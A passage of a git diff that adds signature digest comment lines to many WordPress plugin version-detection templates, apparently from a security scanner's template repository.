490a004630440220659fcc20c90f29e59dd495da1537ac59e0d3e4d4f4b9c9b4472987a554d9953102200717c531e5e4c8f67013cc513c69a3cf226ef82fdf58fd5a7cd619182fe3b38a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 7d861cf06a..6c893f0d3e 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022078c10743b04b9ec601c6abcf4ab4a78795986c9dc53e3b271df91f44f11dad1e022100e3d282a65e98d2c4c231d54a2367f76178d7fc2a57d7a8175462dca867492c46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 00eb1e2dfc..cdacaafb86 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220780078476cd9cf8da22bf0e9de1692612d5221edbc2b8bb1c8b4b3abe11f483e02204faadbaba724dcb374ab90578d3e1322881c3ea76d6c1fbbb37ac5cb439adccc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index f089ee37d3..2baf610ab2 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022040f477f8f313f793a75c9c90b1723183e3018bb95ed2c1842084de68da60561c022100fee6f4653f1f84f78ac00fe4d5141b09efec5bc5b14dd8d6e1c1f211bab9196f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 492d66db68..c22f40ed64 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220684fd187b5d5e90fd3dcea7f665aa7d3322b000fb9b81750e0624d0f97a8b76a022100c4fd1f8859532865da0d68ad6fa5734fe53d1c98b2f235807851779b3ba20d12:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index f8903fa3db..54c2a23329 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d52168bc605d8427a4102076c3b1ae69e4d05462c47e82886ef401b5c9b0fb830220114bf3f76472792e4e485c0d576e282058b3a29fc0e14e535b0ab6f51d3f355f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index ae2451ca38..8bb9cf744d 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e6d1d433e5e321b5bfec963f61151481b0c90ebab0575ee07d2509b68dcad9f902200308fcf738f34447e95440a1af03d5b3299ecb6562d6666692ef4392d05e2b25:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index dcc61d1255..ffa21da9a8 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a1d5c4eb686828fba3d1603197531649cdf4f5f9aa88ecd054b82d3b47ce02060221009117dd06c1718ae7049da31de8b1cdf9b45a15a1fbe87d6424d4ae073226c2dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index d1d2c1c1d0..3da2dab827 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022029ce7232f81e3b051dd5cad0b56c509d9ed9ed9960180766bae869559d87cc590221009c929042b12d165a7039e48bec5a51d0548e48312a53744be20288ce90ac5221:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 5f5e8afed5..56e068a2e9 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d92f50d56eeaa97d015732f9bfd1ec66df32115183e832f6e8d0b256957a5f7002210090f2e4b6ff4aecd4d7c37aedd74cd9c7a054022f3be8a9cfdb426366fbf6bbeb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index d15634bb2b..9edd924f42 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d81ce7d0497a1d294523f65eb5438c141f9d0f9df06093456e724eebc755d115022100c3bba64f7095c868a5614d4a2fbb1f0f5d5cc8227702db27659592953cefb901:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 7da04be5d3..f7c2240b6d 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205d16acb9b8205d069e334f846be52c5ef8ac4f50017bb9bbbb31939916fb12c30220093a3c0765dc56fde27176087881bf29756539b424b98c81c0ab6b36a7d4dcd7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index a79253cec5..b6ac546f8e 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e2c7ef226a73f6469b73c591535bcfa7a27c6847730af89b6cd285642439bd8002205a36e360df6a4051283198bdbf690037f5afbd5f64cf0d715dc930932fe2cebb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 77fc04a220..097480af77 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cb8ed733cc1555ad4fd5cc974145988db3e170040d0946a21125334292b47bea022100a35d9c960ee3524cc6bfcd6c1ab61cd8fb908faa0de1165f502c6c4c00a482b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 733f9ee453..09d89aab88 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202fce55fd16eac8c13329be4ba8f4dca199b61b8a638f62f3881105713e608766022100be6c0ebe6d6420727d0c68a9973939fee3d6361f5cc0e48f080b9c8299b55f8f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index 0af08f0ac0..809930b93c 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206a6139cf6ee37bb7b7c273d32d8a034292e08e9838bf9825bb4ee47fbb127293022100ee1628b3da4045c48c176d7a3a5c8d8ec5f72399fa35b173d7aa3da435ed0d99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 1e4c77fbca..c93104e9cf 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204567ba9b950eb781161136152674085b76b2b8be2fb3ef05374842bb968a7e060220372d0e8ce190cbffe3ad7737954fb246bc797540b258895a87c5ce49f6bed5a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 295e3fe82d..4e21480374 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203fb0f945eb1ec01b8d7862cd18b83923f4110144fc8f632e97544fd1a2e30464022100fb75adba21c5ec1dc03bb557e534f5ee4fbc4a51dbf13a1683b4e918022525ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 862f73201f..2d0fa4fa30 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100bbad762a7ec34c159695614623589870c1d5d7a8c6b03d8d6d6e78d07d12e481022046deb2a3e02934d2aea12a09e7da78dc3fd2aaac18ca10af4c4a7159565d9c36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 711b64f9d0..806001a392 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202a210c6481c1e6f80fb05a8e4d7e4c48f0294e973300ed77c1167064e7b78f1b022100cc4c7d6c376ec3eea784a02b25d172e155d663375dbdc10ce72559a70aeed92f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 58ddcfab78..1bfbd6e088 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100df27de98d34cce19c63620fa41ff328b13bbf8432fbdf88ab075ce38c93b6d70022100e919db6486d0c389c84e656ca4a4396d3ed686b1a97ef6dad5351f52d63a0987:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 305d74e8ea..6d714ea8cc 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220774127210a3fb9f7971b835962a46f6a24e6b0eb0d427cfa3d57bfee99b3a83002201db1803f2d684f2079673b8b93b8e0890cdc8f2835dc989c680f32db9bce931b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 668162fc4e..ed7a23daa0 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203f4ba7c439ff181b93ab15ac0deca01ea5009ae34d45d59fbe2de5bf68ff65350220686dfb8ac979356261a7373f34f6b559a4e9bebf461ae461611fbe0925652720:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 4f99876557..64017121a4 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e0ba579349aa01c5b7fb42c4f57eaa390d4cccdbfa98819f49d2032126123c24022100c5e7cf91c1687b63f67bf045f1cf21f19e86be6562280d69e6f08cd612e0cd71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index a0d2554492..614cfe07a1 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b792f5552cfe9a44b81f08e36944442f33c13425ce16e45b10c314b001653715022033a78671374ecb7949a38604d97c6b27b60d1c1d88574ec46c2aa05f8deaaac4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 4e5046273d..e5274b3dc1 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201e4a1946f923a5eb98832c10e250c7fa86035997e28fb92fb816f65e3ba0b9aa0220016d10aa10b1dbe09041b4d04e7adf8e1249994f70803683f82fd3cc431ce9c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index f44cee7980..c4db53c298 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210088731e5eccce6db5bea326f9571f9f3bb4f5fae56b30fb78903d47ad4e23a091022100840fb10b0325af0359f448aed9d00f79ed766e1ca94106c473cb77786d304eb5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 39130db767..a68ca67cde 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203eae430fb0b4240bed01e86436376818527622c6a2e2c6255208df0bc7de8242022056a2b1c288eea2581854cad0845d0216fc5914f5c14379251e0a088c1aa0c6ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 39c497073c..75d321c180 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203b542868b00c4b10fe4c1b2cee83f79fc20a3cbc45d6a17aeabb6e368c1c9d3702205bfc78e50f31bd16e19451f4324a018403d3ad823e2007b0bb7e95c004f92065:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index b848288b55..27403aa2e1 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203d7efccfcfc0ed22f4a773b0c7b409a8776a06bfc4d74cef1b36ca7c406d87370220774f6043791510cae45881afb28fd0e7afb0a611cc72760166f732f0ce1bbd0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 4d10178692..68e24e4a1b 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022075ad10bc7ecd5be965e636a0f86386de178a3aed843fbd2de6ba7d503090f5ce02205bba22b4801ef6859288b938f675dc6977b98ce537b6fd1ffe481f7ddf494de4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 7aac0a153f..04796d5c23 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022019c26668847a112b6bb06bb6a6ed560c2b263617e0bb827ed2b77f704b776c25022017348dc027cd011b9c48545573636544ff69ef733e199fe37396b07ccc7ffe61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index d0cebd5316..c577683710 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 480a00453043021f1c473ba317a8528870f28e10078cc4ae5de11d92e6a87a77f7538f4e77542302206995e4f0cb78bf08407d2859b2e21e8dde259f037cbea5d5f6669ec260088f81:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index ff20779157..5723fbb04a 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b07b111a0e63fed66aaf34879aa006a99f066c721519bb426dfaf7b47a4442e202204f06761f49523eec3ce45e3a0da1c013e7f410a2aef7198eccb9888239b08a61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index fffdc7d017..1dd287127c 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220412d100cb4636fe11f042b187e400ba214540c3ee038da1f7707367eb5362e9202205baa029d16fc55602edb10cdc2c8d55d40d16e82f2acdd31180d0f0930424f5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 7a9746a70d..cc8a5f5de6 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c346670033bbcf1bdb99026c0941fe15029bfa359e33e7937228e32d79b5de9502205e2dfd9544e790e78dbdd303ab711902336ce13712e3a4564c06302ceac23cf0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 3fe86debf5..db6938c944 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a4dcb1a07aae4840b50bb86f7e55ac9269205b805324f7efd3ebd81e18aabaf0022100b43fedfd40abe151ef805cba2471c705e22681db3c7bf26c5ac8050e6487cd8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 3deac58709..4cc88fd84b 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b57ae89b9b3dc1b58cffc5c0a96bfa3f08904c7a5edfab56c63c1554d7bf9dfc022100bc457b3a3b67be15f49a06687c489bc7b8d5aab49c0de79c7406c32d57e5a69b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index e7e7c27682..3619dec4ff 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100921a500c362a4623b327b46df1a8cd31cfe6fe988580d39751b4b4fef135223e022100898ce4bb184c0a05cc830da6a92500712d89040cea75a5d5fc9d8a2d1638390c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index ad4ebefa4b..fdb70d6803 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210099fcf6fd3e520638a4ce07496d7d086d512c3d9faa862decf1a927e9f33231cd0220769ac062d5b1b71bbd4ff9153249880dac3d2a9a6b132e358b8d106b1f871743:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 8e88c81c0a..12022e2bf5 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100829beb4af576fe6a86f0738e91938f3358479253f2f871b9f3b4fd28492587e502202f1d17bc7836e50c79f2324dea23312e33689be555cc1743672372988ae74800:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index 39d269fb85..b67ea8b10a 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100bc5e0f5e84b99ee04da58f574074ed01f8893517df9525df8308ca9f604344e7022029221caf57f159ff9b90ffad4fdefc0ae9deb585311fc69e8e8f38c7b5e5a741:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index fc126d83c6..176de0373d 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022064433d618ad52fa24c8b493c19cd20640827390bed64ef4df04da6923f138bfa022100d963dd0c063717da0deb50a9d9d0f043cc64baf541efdcb18ba291d665c74581:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 8c49a34259..f2cbae3670 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ee71412835b93d984a46db2e3509fc737f53cfbcc3e19e653a4e764b1f8a04ad0220062a7ed47fc47c46024f08c893cfe69c57c8b19d32b2ad2518b60e908d490317:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 6ac2212b4b..33451699a2 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100faae5094049499711c9933afaf7fac5dcf6c0d00de47a6a754c6fcc0e232c3dc022057e9371559d5909710fd659192bf0e05b7f2d137a8966bf8d0cf40f172f28156:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 71c71b5ed1..520c49e760 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f4c43d5e8eb18338dfb3a5bad1d63c878513332fc7c4d127eb3e363ff493e1440221008918bb5aadc350199efef33c60e9bcca14cb225a91e06abc6f23deafa00158df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 7b47adc274..290ab71df8 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205c2bb358be1596fcdc0150198852a4875240d67b28ac200e69e06214933b4ac20221009b4da49b7ebf1bf868b97b91d1226381f42272a6e595d4eb43e78b502770a9d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index 286dfdaec6..6e683b87e6 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 